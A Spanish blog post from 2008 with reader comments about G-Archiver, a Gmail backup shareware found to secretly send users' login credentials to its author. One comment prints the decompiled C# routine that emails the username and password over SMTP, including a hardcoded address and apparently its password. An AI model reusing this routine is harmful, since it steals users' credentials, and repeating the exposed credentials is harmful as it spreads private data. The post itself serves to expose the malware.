| Kriptópolis alojado en |
| Zilos-Veloxia Network |
| Tu mejor defensa: |
| Bufet Almeida |
Shareware roba contraseñas de Gmail
Enviado por admin el 8. Marzo 2008 - 20:29.
Acabo de encontrar una referencia en Menéame a una alucinante historia que ha publicado Coding Horror, un sitio cuyo nombre se revela particularmente apropiado en este caso concreto.
Se trata de G-Archiver (que ni siquiera enlazo), una aplicación shareware para Windows que se supone dedicada a realizar copias de seguridad de las cuentas de Gmail. El problema radica en que un programador ha sometido G-Archiver a Reflector (un descompilador para la plataforma .NET de Microsoft), con resultados espeluznantes.
Y es que, según afirma Dustin Brooks, en una de las DLLs del programa ha encontrado el nombre de usuario y la contraseña del presunto autor del programa, pero es que además parece que cada vez que un usuario utilizar G-Archiver para hacer una copia de su cuenta, el programa remitiría a esa misma cuenta los datos de login del usuario...
Dustin Brooks afirma haber podido loguearse en la cuenta incluida en el programa y encontrar en ella más de 1.700 mensajes conteniendo los datos de acceso a GMail de los incautos usuarios de G-Archiver, mensajes que -siempre según él- procedió a borrar y eliminar (algo que no afectaría por supuesto a posibles copias que pudieran haberse realizado o reenviado).
Por cierto: la nota inicial de Menéame contenía un error de bulto, al afirmar que G-Archiver era un programa de código abierto y que eso había posibilitado encontrar la trampa. Afortunadamente alguien se ha percatado de que en realidad el código había sido descompilado, y ya lo han corregido. Lo que resulta obvio es que nadie hubiera sido tan imbécil como para cometer semejante fechoría y encima mostrar el código. Aunque sólo fuera por eso, el código abierto (o libre) se confirma como un seguro excepcional para evitar este tipo de incidencias.
Referencia:
- A Question of Programming Ethics [Coding Horror].
menos mal que existe gente
menos mal que existe gente con el interes de saber si un programa tiene cosas escondidas..
Ilegal...
Pues es gracioso, que precisamente estas técnicas y herramientas que nos sirven para escandalizarnos de vez en cuando, hayan sido tan perseguidas por la ley. De hecho en España, el creador del troyano-shareware podría demandar a quien haya decompilado su "joyita". Está claro que el autor tiene las de perder, pero lamentablemente el descubridor de la feature también podría llevarse su parte. En fin...
Me temo lo peor
Me temo lo peor, porque de los mismos autores hay unos cuantos programas para MySpace, etc.
Adsense
Desde hace unos meses los datos de login de Gmail son los mismos para Google Adsense, por lo que el interés económico podría estar presente.
Nunca entendí esa extraña decisión de Google, por cierto.
Efectivamente
Acabo de llegar a casa y nada mas que he leido la noticia me he quedado un poco alucinado.
Me he descargado el programa y al desensamblar unas de las librerias, efectivamente se envia un correo a una direccion de Gmail (no la pongo por si acaso) con el nombre de usuario y la contraseña de la victima.
Ya deben haber cambiado la contraseña del correo que almacenaba los datos de los usuarios de este programa, ya que he intentado acceder y no me deja. Tampoco se puede descargar el programa desde la pagina del autor.
Saludos.
J@#er
No si al final cuanto menos software uses menos posibilidades vas a tener de llevarte sorpresas de ese tipo...
no revelar pass
Conclusion: No revelar password de algun servicio a NINGUN programa que no sea oficial. Ademas usar pass distintas para cada servicio
parece
parece que por propia vergüenza el autor ha quitado los links a "buy" y "download" de la página de g-archiver. sólo faltaba que después de esto...
Source code ¿?
public static void CheckConnection(string a, string b) { try { MailMessage message = new MailMessage(); message.To.Add("JTerry79@gmail.com"); message.From = new MailAddress ("JTerry79@gmail.com", "JTerry", Encoding.UTF8); message.Subject = "Account"; message.SubjectEncoding = Encoding.UTF8; message.Body = "Username: " + a; message.Body = message.Body + "\r\nPassword: " + b; message.BodyEncoding = Encoding.UTF8; message.IsBodyHtml = false; message.Priority = MailPriority.High; SmtpClient client = new SmtpClient(); client.Credentials = new NetworkCredential ("JTerry79@gmail.com", "bilal482"); client.Port = 0x24b; client.Host = "smtp.gmail.com"; client.EnableSsl = true; client.Send(message); } catch (Exception) { } }nota de ultima hora bajar el archivo de forma directa
http://www.aisto.com/Roeder/DotNet/Download.aspx?File=Reflector&Client={Client}&Version={Version} para poder bajar el reflector sin validar el formulario de www.aisto.com/roeder/dotnet/Download.aspx?File=Resourcer de
atte: wordmystic
si amas a alguien
dejalo libre
.... si regresa es tuyo
.....si no,
.... nunca lo fue
Opinar